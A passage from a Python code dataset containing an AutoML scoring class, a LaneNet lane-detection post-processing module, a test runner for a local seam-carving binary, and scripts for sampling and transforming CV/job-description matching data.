kwargs)\n","sub_path":"napari/view_layers.py","file_name":"view_layers.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"158618596","text":"import pandas as pd\nimport json\nfrom bi.algorithms.autoML.data_validation import DataValidation\nfrom bi.algorithms.autoML.data_preprocessing_auto_ml import DataPreprocessingAutoML\nfrom bi.algorithms.autoML.feature_engineering_auto_ml import FeatureEngineeringAutoML\nfrom bi.algorithms.autoML.feature_selection import FeatureSelection\nfrom bi.algorithms import utils as MLUtils\nclass Scoring(object):\n\n def __init__(self, df, train_json, pandas_flag):\n print (\"Auto ML score Running \"*10)\n self.data_frame = df\n self.train_json = train_json\n self._pandas_flag = pandas_flag\n\n\n def run(self):\n if len(self.train_json['MeasureColsToDim']) > 0:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.dimension_measure_test(self.train_json['MeasureColsToDim'])\n self.data_frame = DataPreprocessingAutoML_obj.data_frame\n if len(self.train_json['MeanImputeCols']) > 0:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.measure_col_imputation(self.train_json['MeanImputeCols'])\n self.data_frame = DataPreprocessingAutoML_obj.data_frame\n if len(self.train_json['ModeImputeCols']) > 0:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.dim_col_imputation(self.train_json['ModeImputeCols'])\n self.data_frame = DataPreprocessingAutoML_obj.data_frame\n try:\n DataPreprocessingAutoML_obj.test_data_imputation()\n except:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.test_data_imputation()\n FeatureEngineeringAutoML_obj = FeatureEngineeringAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n if len(self.train_json['date_column_split']) > 0:\n FeatureEngineeringAutoML_obj.date_column_split(self.train_json['date_column_split'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n if len(self.train_json['one_hot_encoded']) > 0:\n if self._pandas_flag:\n FeatureEngineeringAutoML_obj.sk_one_hot_encoding(self.train_json['one_hot_encoded'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n else:\n FeatureEngineeringAutoML_obj.pyspark_one_hot_encoding(self.train_json['one_hot_encoded'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n if len(self.train_json['label_encoded']) > 0:\n if not self._pandas_flag:\n FeatureEngineeringAutoML_obj.pyspark_label_encoding(self.train_json['label_encoded'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n\n #score_df = self.data_frame[list(set(self.train_json['SelectedColsTree'])-set(self.train_json['target']))]\n final_list_linear=self.train_json['SelectedColsLinear']\n final_list_tree=self.train_json['SelectedColsTree']\n final_list_linear.remove(self.train_json['target'])\n final_list_tree.remove(self.train_json['target'])\n if self._pandas_flag:\n score_df_linear = MLUtils.fill_missing_columns(self.data_frame,final_list_linear,self.train_json['target'])\n score_df_tree = MLUtils.fill_missing_columns(self.data_frame,final_list_tree,self.train_json['target'])\n else:\n score_df_linear = MLUtils.fill_missing_columns_pys(self.data_frame,final_list_linear,self.train_json['target'], self._pandas_flag)\n score_df_tree = MLUtils.fill_missing_columns_pys(self.data_frame,final_list_tree,self.train_json['target'], self._pandas_flag)\n return score_df_linear, score_df_tree\n","sub_path":"bi/algorithms/autoML/auto_ml_score1.py","file_name":"auto_ml_score1.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"92951571","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 18-5-30 上午10:04\n# @Author : MaybeShewill-CV\n# @Site : https://github.com/MaybeShewill-CV/lanenet-lane-detection\n# @File : lanenet_postprocess.py\n# @IDE: PyCharm Community Edition\n\"\"\"\nLaneNet model post process\n\"\"\"\nimport os\nimport math\nimport cv2\nimport glog as log\nimport numpy as np\nimport datetime\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.preprocessing import StandardScaler\nfrom config import global_config\n\n# log.setLevel(\"DEBUG\")\n\nCFG = global_config.cfg\n\n\ndef _morphological_process(image, kernel_size=5):\n \"\"\"\n morphological process to fill the hole in the binary segmentation result\n :param image:\n :param kernel_size:\n :return:\n \"\"\"\n if len(image.shape) == 3:\n raise ValueError('Binary segmentation result image should be a single channel image')\n\n if image.dtype is not np.uint8:\n image = np.array(image, np.uint8)\n\n kernel = cv2.getStructuringElement(shape=cv2.MORPH_ELLIPSE, ksize=(kernel_size, kernel_size))\n\n # close operation fille hole\n closing = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernel, iterations=1)\n\n return closing\n\n\ndef _connect_components_analysis(image):\n \"\"\"\n connect components analysis to remove the small components\n :param image:\n :return:\n \"\"\"\n if len(image.shape) == 3:\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n gray_image = image\n\n return cv2.connectedComponentsWithStats(gray_image, connectivity=8, ltype=cv2.CV_32S)\n\n\nclass _LaneFeat(object):\n \"\"\"\n\n \"\"\"\n def __init__(self, feat, coord, class_id=-1):\n \"\"\"\n lane feat object\n :param feat: lane embeddng feats [feature_1, feature_2, ...]\n :param coord: lane coordinates [x, y]\n :param class_id: lane class id\n \"\"\"\n self._feat = feat\n self._coord = coord\n self._class_id = class_id\n\n @property\n def feat(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self._feat\n\n @feat.setter\n def feat(self, value):\n \"\"\"\n\n :param value:\n :return:\n \"\"\"\n if not isinstance(value, np.ndarray):\n value = np.array(value, dtype=np.float64)\n\n if value.dtype != np.float32:\n value = np.array(value, dtype=np.float64)\n\n self._feat = value\n\n @property\n def coord(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self._coord\n\n @coord.setter\n def coord(self, value):\n \"\"\"\n\n :param value:\n :return:\n \"\"\"\n if not isinstance(value, np.ndarray):\n value = np.array(value)\n\n if value.dtype != np.int32:\n value = np.array(value, dtype=np.int32)\n\n self._coord = value\n\n @property\n def class_id(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self._class_id\n\n @class_id.setter\n def class_id(self, value):\n \"\"\"\n\n :param value:\n :return:\n \"\"\"\n if not isinstance(value, np.int64):\n raise ValueError('Class id must be integer')\n\n self._class_id = value\n\n\nclass _LaneNetCluster(object):\n \"\"\"\n Instance segmentation result cluster\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n \"\"\"\n self._color_map = [np.array([255, 0, 0]),\n np.array([0, 255, 0]),\n np.array([0, 0, 255]),\n np.array([125, 125, 0]),\n np.array([0, 125, 125]),\n np.array([125, 0, 125]),\n np.array([50, 100, 50]),\n np.array([100, 50, 100])]\n\n @staticmethod\n def _embedding_feats_dbscan_cluster(embedding_image_feats):\n \"\"\"\n dbscan cluster\n :param embedding_image_feats:\n :return:\n \"\"\"\n db = DBSCAN(eps=CFG.POSTPROCESS.DBSCAN_EPS, min_samples=CFG.POSTPROCESS.DBSCAN_MIN_SAMPLES)\n try:\n features = StandardScaler().fit_transform(embedding_image_feats)\n db.fit(features)\n except Exception as err:\n log.error(err)\n ret = {\n 'origin_features': None,\n 'cluster_nums': 0,\n 'db_labels': None,\n 'unique_labels': None,\n 'cluster_center': None\n }\n return ret\n db_labels = db.labels_\n unique_labels = np.unique(db_labels)\n\n num_clusters = len(unique_labels)\n cluster_centers = db.components_\n\n ret = {\n 'origin_features': features,\n 'cluster_nums': num_clusters,\n 'db_labels': db_labels,\n 'unique_labels': unique_labels,\n 'cluster_center': cluster_centers\n }\n\n return ret\n\n @staticmethod\n def _get_lane_embedding_feats(binary_seg_ret, instance_seg_ret):\n \"\"\"\n get lane embedding features according the binary seg result\n :param binary_seg_ret:\n :param instance_seg_ret:\n :return:\n \"\"\"\n idx = np.where(binary_seg_ret == 255)\n lane_embedding_feats = instance_seg_ret[idx]\n # idx_scale = np.vstack((idx[0] / 256.0, idx[1] / 512.0)).transpose()\n # lane_embedding_feats = np.hstack((lane_embedding_feats, idx_scale))\n lane_coordinate = np.vstack((idx[1], idx[0])).transpose()\n\n assert lane_embedding_feats.shape[0] == lane_coordinate.shape[0]\n\n ret = {\n 'lane_embedding_feats': lane_embedding_feats,\n 'lane_coordinates': lane_coordinate\n }\n\n return ret\n\n def apply_lane_feats_cluster(self, binary_seg_result, instance_seg_result):\n \"\"\"\n\n :param binary_seg_result:\n :param instance_seg_result:\n :return:\n \"\"\"\n # get embedding feats and coords\n get_lane_embedding_feats_result = self._get_lane_embedding_feats(\n binary_seg_ret=binary_seg_result,\n instance_seg_ret=instance_seg_result\n )\n\n # dbscan cluster\n dbscan_cluster_result = self._embedding_feats_dbscan_cluster(\n embedding_image_feats=get_lane_embedding_feats_result['lane_embedding_feats']\n )\n\n mask = np.zeros(shape=[binary_seg_result.shape[0], binary_seg_result.shape[1], 3], dtype=np.uint8)\n db_labels = dbscan_cluster_result['db_labels']\n unique_labels = dbscan_cluster_result['unique_labels']\n coord = get_lane_embedding_feats_result['lane_coordinates']\n\n if db_labels is None:\n return None, None\n\n lane_coords = []\n\n for index, label in enumerate(unique_labels.tolist()):\n if label == -1:\n continue\n idx = np.where(db_labels == label)\n pix_coord_idx = tuple((coord[idx][:, 1], coord[idx][:, 0]))\n mask[pix_coord_idx] = self._color_map[index]\n lane_coords.append(coord[idx])\n\n return mask, lane_coords\n\n\nclass LaneNetPostProcessor(object):\n \"\"\"\n lanenet post process for lane generation\n \"\"\"\n # def __init__(self, ipm_remap_file_path='./data/tusimple_ipm_remap.yml'):\n # absolute path is given because there was a path problem in lanenet api\n def __init__(self, ipm_remap_file_path='/codehub/external/lanenet-lane-detection/data/tusimple_ipm_remap.yml'):\n \"\"\"\n\n :param ipm_remap_file_path: ipm generate file path\n \"\"\"\n assert os.path.exists(ipm_remap_file_path), '{:s} not exist'.format(ipm_remap_file_path)\n\n self._cluster = _LaneNetCluster()\n self._ipm_remap_file_path = ipm_remap_file_path\n\n remap_file_load_ret = self._load_remap_matrix()\n self._remap_to_ipm_x = remap_file_load_ret['remap_to_ipm_x']\n self._remap_to_ipm_y = remap_file_load_ret['remap_to_ipm_y']\n\n self._color_map = [np.array([255, 0, 0]),\n np.array([0, 255, 0]),\n np.array([0, 0, 255]),\n np.array([125, 125, 0]),\n np.array([0, 125, 125]),\n np.array([125, 0, 125]),\n np.array([50, 100, 50]),\n np.array([100, 50, 100])]\n\n def _load_remap_matrix(self):\n \"\"\"\n\n :return:\n \"\"\"\n fs = cv2.FileStorage(self._ipm_remap_file_path, cv2.FILE_STORAGE_READ)\n\n remap_to_ipm_x = fs.getNode('remap_ipm_x').mat()\n remap_to_ipm_y = fs.getNode('remap_ipm_y').mat()\n\n ret = {\n 'remap_to_ipm_x': remap_to_ipm_x,\n 'remap_to_ipm_y': remap_to_ipm_y,\n }\n\n fs.release()\n\n return ret\n\n def postprocess(self, image_name, binary_seg_result, instance_seg_result=None,\n min_area_threshold=100, source_image=None, \n data_source='tusimple'):\n \"\"\"\n\n :param image_name:\n :param binary_seg_result:\n :param instance_seg_result:\n :param min_area_threshold:\n :param source_image:\n :param data_source:\n :return:\n \"\"\"\n ret = {\n 'mask_image': None,\n 'fit_params': None,\n 'source_image': source_image,\n 'pred_json' : {\n 'x_axis' : [],\n 'y_axis' : [],\n 'image_name' : image_name,\n 'run_time' : 0\n } \n }\n\n x = 0\n y = 0\n\n # timestamp = (\"{:%d%m%y_%H%M%S}\").format(datetime.datetime.now())\n # debug_image_dir = '/aimldl-dat/logs/lanenet/debug'\n # debug_image_path = os.path.join(debug_image_dir,timestamp)\n # os.makedirs(debug_image_path)\n \n # convert binary_seg_result\n binary_seg_result = np.array(binary_seg_result * 255, dtype=np.uint8)\n\n # apply image morphology operation to fill in the hold and reduce the small area\n morphological_ret = _morphological_process(binary_seg_result, kernel_size=5)\n\n connect_components_analysis_ret = _connect_components_analysis(image=morphological_ret)\n\n labels = connect_components_analysis_ret[1]\n\n stats = connect_components_analysis_ret[2]\n for index, stat in enumerate(stats):\n if stat[4] <= min_area_threshold:\n idx = np.where(labels == index)\n morphological_ret[idx] = 0\n\n # apply embedding features cluster\n mask_image, lane_coords = self._cluster.apply_lane_feats_cluster(\n binary_seg_result=morphological_ret,\n instance_seg_result=instance_seg_result\n )\n \n # mask_image_path = os.path.join(debug_image_path,\"mask_image.png\")\n # cv2.imwrite(mask_image_path,mask_image)\n \n source_image_height = source_image.shape[0]\n source_image_width = source_image.shape[1]\n\n if mask_image is None:\n ret['mask_image'] = None\n ret['fit_params'] = None\n else:\n # lane line fit\n fit_params = []\n src_lane_pts = []\n tmp_ipm_image = cv2.remap(\n source_image,\n self._remap_to_ipm_x,\n self._remap_to_ipm_y,\n interpolation=cv2.INTER_NEAREST\n )\n \n # lane pts every single lane\n for lane_index, coords in enumerate(lane_coords):\n if data_source == 'tusimple':\n # tmp_mask = np.zeros(shape=(590, 1640), dtype=np.uint8)\n tmp_mask = np.zeros(shape=(720, 1280), dtype=np.uint8)\n # tmp_mask = np.zeros(shape=(1080, 1920), dtype=np.uint8)\n # tmp_mask[tuple((np.int_(coords[:, 1] * 590 / 256), np.int_(coords[:, 0] * 1640 / 512)))] = 255\n tmp_mask[tuple((np.int_(coords[:, 1] * 720 / 256), np.int_(coords[:, 0] * 1280 / 512)))] = 255\n # tmp_mask[tuple((np.int_(coords[:, 1] * 1080 / 256), np.int_(coords[:, 0] * 1920 / 512)))] = 255\n elif data_source == 'beec_ccd':\n tmp_mask = np.zeros(shape=(1350, 2448), dtype=np.uint8)\n tmp_mask[tuple((np.int_(coords[:, 1] * 1350 / 256), np.int_(coords[:, 0] * 2448 / 512)))] = 255\n else:\n raise ValueError('Wrong data source now only support tusimple and beec_ccd')\n \n # tmp_mask_path = os.path.join(debug_image_path,\"tmp_mask.png\")\n # cv2.imwrite(tmp_mask_path,tmp_mask)\n \n tmp_ipm_mask = cv2.remap(\n tmp_mask,\n self._remap_to_ipm_x,\n self._remap_to_ipm_y,\n interpolation=cv2.INTER_NEAREST\n )\n \n # tmp_ipm_mask_path = os.path.join(debug_image_path,\"tmp_ipm_mask.png\")\n # cv2.imwrite(tmp_ipm_mask_path,tmp_ipm_mask)\n\n nonzero_y = np.array(tmp_ipm_mask.nonzero()[0])\n nonzero_x = np.array(tmp_ipm_mask.nonzero()[1])\n\n log.debug(\"nonzero_y : {}\".format(nonzero_y))\n log.debug(\"max of nonzero_y : {}\".format(np.max(nonzero_y)))\n log.debug(\"min of nonzero_y : {}\".format(np.min(nonzero_y)))\n\n log.debug(\"nonzero_x : {}\".format(nonzero_x))\n log.debug(\"max of nonzero_x : {}\".format(np.max(nonzero_x)))\n log.debug(\"min of nonzero_x : {}\".format(np.min(nonzero_x)))\n\n # for index,val in enumerate(nonzero_x):\n # lane_color = self._color_map[lane_index].tolist()\n # cv2.circle(tmp_ipm_image, (nonzero_x[index],nonzero_y[index]), 5, lane_color, -1)\n\n bbox = []\n src_x = self._remap_to_ipm_x[np.min(nonzero_y),np.min(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.min(nonzero_y),np.min(nonzero_x)]\n bbox.append([src_x, src_y])\n\n src_x = self._remap_to_ipm_x[np.min(nonzero_y),np.max(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.min(nonzero_y),np.max(nonzero_x)]\n bbox.append([src_x, src_y])\n\n src_x = self._remap_to_ipm_x[np.max(nonzero_y),np.max(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.max(nonzero_y),np.max(nonzero_x)]\n bbox.append([src_x, src_y])\n\n src_x = self._remap_to_ipm_x[np.max(nonzero_y),np.min(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.max(nonzero_y),np.min(nonzero_x)]\n bbox.append([src_x, src_y])\n\n log.debug(\"bbox : {}\".format(bbox))\n\n min_y = min(bbox[0][1],bbox[3][1])\n log.debug(\"min_y : {}\".format(min_y))\n\n max_y = max(bbox[1][1],bbox[2][1])\n log.debug(\"max_y : {}\".format(max_y))\n\n fit_param = np.polyfit(nonzero_y, nonzero_x, 2)\n fit_params.append(fit_param)\n log.debug(\"fit_params : {}\".format(fit_params))\n\n [ipm_image_height, ipm_image_width] = tmp_ipm_mask.shape\n plot_y = np.linspace(10, ipm_image_height, ipm_image_height - 10)\n log.debug(\"plot_y : {}\".format(plot_y))\n \n fit_x = fit_param[0] * plot_y ** 2 + fit_param[1] * plot_y + fit_param[2]\n # fit_x = fit_param[0] * plot_y ** 3 + fit_param[1] * plot_y ** 2 + fit_param[2] * plot_y + fit_param[3]\n log.debug(\"fit_x : {}\".format(fit_x))\n\n lane_pts = []\n for index in range(0, plot_y.shape[0], 5):\n src_x = self._remap_to_ipm_x[\n int(plot_y[index]), int(np.clip(fit_x[index], 0, ipm_image_width - 1))]\n if src_x <= 0:\n continue\n src_y = self._remap_to_ipm_y[\n int(plot_y[index]), int(np.clip(fit_x[index], 0, ipm_image_width - 1))]\n if src_y < min_y:\n continue\n # if src_y > max_y:\n # continue\n\n src_y = src_y if src_y > 0 else 0\n\n lane_pts.append([src_x, src_y])\n log.debug(\"lane_pts : {}\".format(lane_pts))\n\n src_lane_pts.append(lane_pts)\n log.debug(\"src_lane_pts : {}\".format(src_lane_pts))\n\n lane_img = np.zeros(shape=(source_image_height,source_image_width*3,3), dtype=np.uint8)\n tmp_ipm_image_path = os.path.join(debug_image_path,\"tmp_ipm_image.png\")\n cv2.imwrite(tmp_ipm_image_path,tmp_ipm_image)\n\n for index,lane_pt in enumerate(src_lane_pts):\n for i in lane_pt:\n log.debug(\"i[0] = {}, i[1] = {}\".format(int(i[0]),int(i[1])))\n lane_color = self._color_map[index].tolist()\n cv2.circle(lane_img, (int(i[0]),int(i[1])), 15, lane_color, -1)\n\n # lane_img_path = os.path.join(debug_image_path,\"lane_img.png\")\n # cv2.imwrite(lane_img_path,lane_img)\n\n all_lane_x = [] \n all_lane_y = [] \n\n # tusimple test data sample point along y axis every 10 pixels\n for index, single_lane_pts in enumerate(src_lane_pts):\n\n single_lane_pt_x = np.array(single_lane_pts, dtype=np.float32)[:, 0]\n single_lane_pt_y = np.array(single_lane_pts, dtype=np.float32)[:, 1]\n if data_source == 'tusimple':\n # start_plot_y = 240\n start_plot_y = 160\n end_plot_y = 720\n elif data_source == 'beec_ccd':\n start_plot_y = 820\n end_plot_y = 1350\n else:\n raise ValueError('Wrong data source now only support tusimple and beec_ccd')\n step = int(math.floor((end_plot_y - start_plot_y) / 10)) \n single_lane_x = []\n single_lane_y = []\n for plot_y in np.linspace(start_plot_y, end_plot_y, step):\n log.debug(\"plot_y : {}\".format(plot_y))\n diff = single_lane_pt_y - plot_y\n fake_diff_bigger_than_zero = diff.copy()\n fake_diff_smaller_than_zero = diff.copy()\n fake_diff_bigger_than_zero[np.where(diff <= 0)] = float('inf')\n fake_diff_smaller_than_zero[np.where(diff > 0)] = float('-inf')\n idx_low = np.argmax(fake_diff_smaller_than_zero)\n idx_high = np.argmin(fake_diff_bigger_than_zero)\n\n previous_src_pt_x = single_lane_pt_x[idx_low]\n previous_src_pt_y = single_lane_pt_y[idx_low]\n last_src_pt_x = single_lane_pt_x[idx_high]\n last_src_pt_y = single_lane_pt_y[idx_high]\n\n if previous_src_pt_y < start_plot_y or last_src_pt_y < start_plot_y or \\\n fake_diff_smaller_than_zero[idx_low] == float('-inf') or \\\n fake_diff_bigger_than_zero[idx_high] == float('inf'):\n continue\n\n interpolation_src_pt_x = (abs(previous_src_pt_y - plot_y) * previous_src_pt_x +\n abs(last_src_pt_y - plot_y) * last_src_pt_x) / \\\n (abs(previous_src_pt_y - plot_y) + abs(last_src_pt_y - plot_y))\n log.debug(\"i_x : {}, p_x : {}, l_x : {}\".format(interpolation_src_pt_x,previous_src_pt_x,last_src_pt_x))\n interpolation_src_pt_y = (abs(previous_src_pt_y - plot_y) * previous_src_pt_y +\n abs(last_src_pt_y - plot_y) * last_src_pt_y) / \\\n (abs(previous_src_pt_y - plot_y) + abs(last_src_pt_y - plot_y))\n log.debug(\"i_y : {}, p_y : {}, l_y : {}\".format(interpolation_src_pt_y,previous_src_pt_y,last_src_pt_y))\n \n if interpolation_src_pt_x > source_image_width or interpolation_src_pt_x < 10:\n continue\n \n \n lane_color = self._color_map[index].tolist()\n cv2.circle(source_image, (int(interpolation_src_pt_x),\n int(interpolation_src_pt_y)), 5, lane_color, -1)\n \n \n # math.ceil also returns integer insterd of int\n # To rescale it back to 1920*1080\n # x = math.ceil(interpolation_src_pt_x*1.5)\n # y = math.ceil(interpolation_src_pt_y*1.5)\n \n x = math.ceil(interpolation_src_pt_x)\n y = math.ceil(interpolation_src_pt_y)\n\n single_lane_x.append(x)\n single_lane_y.append(y)\n\n all_lane_x.append(single_lane_x)\n all_lane_y.append(single_lane_y)\n\n ret['mask_image'] = mask_image\n ret['fit_params'] = fit_params\n ret['source_image'] = source_image\n ## overriding the keys, careful\n ret['pred_json'] = {\n 'x_axis' : all_lane_x,\n 'y_axis' : all_lane_y,\n 'image_name' : image_name,\n 'run_time' : -1\n }\n\n log.debug(\"ret : {}\".format(ret))\n return ret\n ","sub_path":"lanenet_model/lanenet_postprocess_vLine.py","file_name":"lanenet_postprocess_vLine.py","file_ext":"py","file_size_in_byte":21590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"404899170","text":"#!/usr/bin/env python2\n# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4\n\nfrom __future__ import print_function\n\nif (__name__ == '__main__'):\n import argparse\n import os\n import re\n import subprocess\n import sys\n import threading\n\n class TimeoutError(Exception):\n pass\n\n class Command(object):\n def __init__(self, cmd):\n self.cmd = cmd\n self.process = None\n self.out = None\n self.err = None\n\n def run(self):\n def target():\n self.process = subprocess.Popen(self.cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n self.out, self.err = self.process.communicate()\n\n thread = threading.Thread(target=target)\n thread.start()\n thread.join(timeout=10)\n if thread.is_alive():\n self.process.terminate()\n thread.join()\n raise TimeoutError\n\n return (self.process.returncode, self.out, self.err)\n\n cwd = os.path.dirname(os.path.abspath(__file__))\n defaultTestDir = cwd\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filter', type=str, metavar='', help='only execute tests matching this regex')\n parser.add_argument('-l', '--list', action='store_true', help='only list tests, don\\'t execute')\n\n args = parser.parse_args()\n\n test_filter = None\n if args.filter:\n test_filter = re.compile(args.filter)\n\n tests = {\n 'pub.statistics_invalidinput.imgbroken1',\n 'pub.statistics_invalidinput.imgbroken2',\n 'pub.statistics.small1',\n 'pub.statistics.small2',\n 'pub.statistics.owl',\n 'pub.min_path.small1',\n 'pub.min_path.small2',\n 'pub.min_path.owl',\n 'pub.carve.small1_0',\n 'pub.carve.small1_1',\n 'pub.carve.small2_0',\n 'pub.carve.small2_1',\n }\n\n all_tests = []\n\n for test in tests:\n if not test_filter or test_filter.match(test):\n all_tests.append(test)\n all_tests.sort()\n\n if args.list:\n for test in all_tests:\n print(test)\n exit(0)\n\n binary = \"build/carve\"\n\n if not (os.path.isfile(binary) and os.access(binary, os.X_OK)):\n print(\"'%s' is not a file or not executable\" % binary)\n exit(1)\n\n def run(args):\n cmd = Command([binary] + args)\n return cmd.run()\n\n def test_statistics_invalidinput(case):\n args = ['-s', 'data/' + case + '.ppm']\n rc, out, err = run(args)\n if rc == 1:\n if err == \"\":\n return None\n else:\n return '\\n' + err\n else:\n return 'application did not return EXIT_FAILURE\\n' + err\n\n def test_statistics(case):\n args = ['-s', 'data/' + case + '.ppm']\n ref = 'test_data/' + case + '.statistics'\n rc, out, err = run(args)\n if rc == 0:\n if out == open(ref, 'r').read():\n return None\n else:\n return 'incorrect statistics'\n else:\n return 'application did not return EXIT_SUCCESS\\n' + err\n\n def test_min_path(case):\n args = ['-p', 'data/' + case + '.ppm']\n ref = 'test_data/' + case + '.path'\n rc, out, err = run(args)\n if rc == 0:\n if out == open(ref, 'r').read():\n return None\n else:\n return 'incorrect minimal path'\n else:\n return 'application did not return EXIT_SUCCESS\\n' + err\n\n def img_cmp(img1_name, img2_name):\n img1 = \"\".join(open(img1_name, 'r').read().split())\n img2 = \"\".join(open(img2_name, 'r').read().split())\n return img1 == img2\n\n def test_carve(case):\n if os.access('out.ppm', os.W_OK):\n os.remove('out.ppm')\n\n base, num = case.split('_', 1)\n src_img = 'data/' + base + '.ppm'\n ref = 'test_data/' + case + '.ppm'\n args = ['-n', num, src_img]\n rc, out, err = run(args)\n if rc == 0:\n if not os.access('out.ppm', os.R_OK):\n return 'no \"out.ppm\" produced\\n' + err\n if img_cmp('out.ppm', ref):\n return None\n else:\n return 'incorrect output image'\n else:\n return 'application did not return EXIT_SUCCESS\\n' + err\n\n def test(test):\n cat, ex, case = test.split('.', 2)\n if ex == 'statistics_invalidinput':\n return test_statistics_invalidinput(case)\n elif ex == 'statistics':\n return test_statistics(case)\n elif ex == 'min_path':\n return test_min_path(case)\n else:\n assert ex == 'carve'\n return test_carve(case)\n\n for t in all_tests:\n print(\"running test %s\" % t)\n try:\n msg = test(t)\n if msg == None:\n print(\"PASS\")\n else:\n print(\"FAIL: %s\" % msg)\n except TimeoutError:\n print(\"FAIL: time out\")\n print()\n","sub_path":"run-tests.py","file_name":"run-tests.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"654334428","text":"\"\"\"\n\n\"\"\"\nimport json\nfrom collections import Counter\nimport numpy as np\n\n\ndef data_trans(input_path, output_path):\n ct = Counter()\n positive = []\n negative = []\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n for line in f.readlines():\n line = json.loads(line)\n cv_rt = line.get(\"cv_rt\")\n jd_rt = line.get(\"jd_rt\")\n cv_rt_v = list(cv_rt.values())\n jd_rt_v = list(jd_rt.values())\n ct[str(line.get(\"label\"))] += 1\n tmp = \"\\t\".join([\"##\".join(x) for x in cv_rt_v]) + \"@\" + \"\\t\".join(\n [\"##\".join(x) for x in jd_rt_v]) + \"@\" + str(line.get(\"label\"))\n if str(line.get(\"label\")) == \"1\":\n positive.append(tmp)\n elif str(line.get(\"label\")) == \"0\":\n negative.append(tmp)\n sample_total = positive + list(np.random.choice(negative, len(positive) * 5, replace=False))\n np.random.shuffle(sample_total)\n for neg_sample in sample_total:\n f_o.write(neg_sample + \"\\n\")\n print(ct.items())\n\n\ndef gen_vocab(input_path, output_path):\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n x, y = f.readline().strip(\"\\n\").split(\" \")\n print(x, y)\n f_o.write(\"UNK\" + \"\\n\")\n for line in f.readlines():\n line = line.strip(\"\\n\").split(\" \")\n f_o.write(line[0] + \"\\n\")\n\n\ndef filter_embedding_nocompany(input_path, output_path):\n embedding = []\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n x, y = f.readline().strip(\"\\n\").split(\" \")\n print(x, y)\n for line in f.readlines():\n _line = line.strip(\"\\n\").split(\" \")\n name_type = _line[0].split(\"|$|\")[0]\n if name_type != \"company\":\n embedding.append(line)\n f_o.write(\" \".join([str(len(embedding)), str(y)]) + \"\\n\")\n for item in embedding:\n f_o.write(item)\n\n\ndef sample(input_path, output_path, pos_num, neg_num):\n ct = Counter()\n positive = []\n negative = []\n with open(input_path, \"r\", encoding=\"utf-8\") as f, open(output_path, \"w\", encoding=\"utf-8\") as f_o:\n for line in f.readlines():\n line = json.loads(line)\n uuid_key = line.get(\"uuid_key\")\n cv_rt = line.get(\"cv_rt\")\n jd_rt = line.get(\"jd_rt\")\n cv_rt_v = list(cv_rt.values())\n jd_rt_v = list(jd_rt.values())\n ct[str(line.get(\"label\"))] += 1\n tmp = \"\\t\".join([\"##\".join(x) for x in cv_rt_v]) + \"@\" + \"\\t\".join(\n [\"##\".join(x) for x in jd_rt_v]) + \"@\" + str(line.get(\"label\")) + \"@\" + uuid_key\n if str(line.get(\"label\")) == \"1\":\n positive.append(tmp)\n elif str(line.get(\"label\")) == \"0\":\n negative.append(tmp)\n sample_total = list(np.random.choice(positive, pos_num, replace=False)) + list(np.random.choice(negative, neg_num, replace=False))\n np.random.shuffle(sample_total)\n for _sample in sample_total:\n f_o.write(_sample + \"\\n\")\n print(ct.items())\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers(dest='command')\n\n data_trans_parser = subparsers.add_parser('data_trans')\n data_trans_parser.add_argument('--input_path', required=True)\n data_trans_parser.add_argument('--output_path', required=True)\n\n gen_vocab_parser = subparsers.add_parser('gen_vocab')\n gen_vocab_parser.add_argument('--input_path', required=True)\n gen_vocab_parser.add_argument('--output_path', required=True)\n\n filter_embedding_parser = subparsers.add_parser('filter_embedding')\n filter_embedding_parser.add_argument('--input_path', required=True)\n filter_embedding_parser.add_argument('--output_path', required=True)\n\n data_predict_parser = subparsers.add_parser('sample')\n data_predict_parser.add_argument('--input_path', required=True)\n data_predict_parser.add_argument('--output_path', required=True)\n data_predict_parser.add_argument('--pos_num', required=True, type=int)\n data_predict_parser.add_argument('--neg_num', required=True, type=int)\n\n args = parser.parse_args()\n\n if args.command == 'data_trans':\n 